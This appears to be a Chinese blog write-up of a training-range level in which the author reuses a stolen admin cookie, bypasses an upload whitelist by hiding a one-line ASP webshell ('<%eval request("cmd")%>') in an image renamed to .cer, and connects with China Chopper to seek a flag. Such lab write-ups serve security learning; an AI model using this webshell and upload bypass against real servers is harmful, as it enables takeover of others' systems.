• 封神台靶场:第五章:进击!拿到Web最高权限!【配套课时:绕过防护上传木马实战演练】


    提示:
    1,通过修改Cookie登录后台(没用重打)2,上传SHELL!3,Flag在Web根目录(flag.php)3.上传图片时建议上传小文件,我建议用QQ表情

    尤里通过XSS终于得到了管理员Cookie,在修改了cookie后尤里直接绕过了登录密码,
    看到了后台功能!然后要做的,就是找一个上传点,上传自己的外壳了!

    靶场地址

    http://59.63.200.79:8005/admin/Login.asp

    1、登录后台

    根据提示--------------直接抓包

    上一关获取了管理员Cookie

    ASPSESSIONIDSQATTCBS=JJLAMLACCEODAHFIAOCGBPLA; flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC
    
    去除flag部分,如下
    
    ASPSESSIONIDSQATTCBS=JJLAMLACCEODAHFIAOCGBPLA;ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC

    将原有的Cookie进行替换

     登录成功

     2、上传Shell

    通过对后台页面研究发现,此处可能有机会上传一句话木马,且上传类型限制为白名单

     看见cer。我直接就想到了上传cer文件木马,说干就干

     直接上传一句话木马重命名的cer文件出现这个情况,我猜后台应该对文件内容有所过滤。

    随便找一张jpg图片(正常的),选择属性--->双击--->写入一句话木马

    在将这张jpg图片进行重命名为cer文件

    将cer文件上传,上传成功

     3、菜刀连接

     连接成功后,在C盘下有flag,由于一句话木马权限不够,将flag下载到桌面

     本以为到这里就结束了,后来发现对这个falg.txt文件没有操作权限。

        尝试上传大马,但上传不了。D盘、E盘也点不开。

        百思不得其解时,我看得见网页后缀为asp。

      一下反应过来,上传包含了asp一句话木马的cer文件

    <%eval request("cmd")%>

      但还是没有办法下载,访问在C盘的那个flag.txt文件。

        但是D盘可以打开了

      

     4、成功拿到flag

  • 相关阅读:
    寒假学习第九天
    寒假学习第八天
    寒假学习第七天
    寒假学习第六天
    寒假学习第五天
    寒假学习第四天
    寒假学习第三天
    寒假学习第二天
    寒假学习第一天
    阅读笔记
  • 原文地址:https://www.cnblogs.com/Xshun-z/p/13982644.html
Copyright © 2020-2023  润新知